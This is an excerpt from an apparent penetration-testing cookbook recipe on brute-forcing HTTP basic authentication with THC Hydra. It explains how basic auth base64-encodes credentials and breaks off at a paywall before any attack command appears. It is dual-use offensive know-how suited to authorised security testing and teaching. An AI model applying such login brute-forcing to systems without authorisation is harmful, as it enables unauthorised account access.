Brute forcing basic authentication with Hydra

THC Hydra (or simply Hydra) is a network online logon cracker; this means it can be used to find login passwords by brute forcing active network services. Among the many services Hydra supports, we can find HTTP form login and HTTP basic authentication.

In HTTP basic authentication, the browser sends the username and password, encoded using base64 encoding, in the Authorization header. For example, if the username is admin and the password is Password, the browser will encode admin:Password, resulting in the string YWRtaW46UGFzc3dvcmQ= and the request header will have a line such as this:

Authorization: Basic YWRtaW46UGFzc3dvcmQ=
Almost every time we see a seemingly random alphanumeric string ending in one or two equal to (=) symbols, that string is base64 encoded. We can easily decode it using Burp Suite's Decoder or the base64 command in Kali Linux. The = symbol may be encoded to be URL-friendly, that is, replaced by %3D in some requests and responses.

In the previous recipe, we used Burp Suite's Intruder to attack a login form; in this recipe, we will use THC Hydra to attack a different login mechanism, HTTP basic authentication.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.140.186.201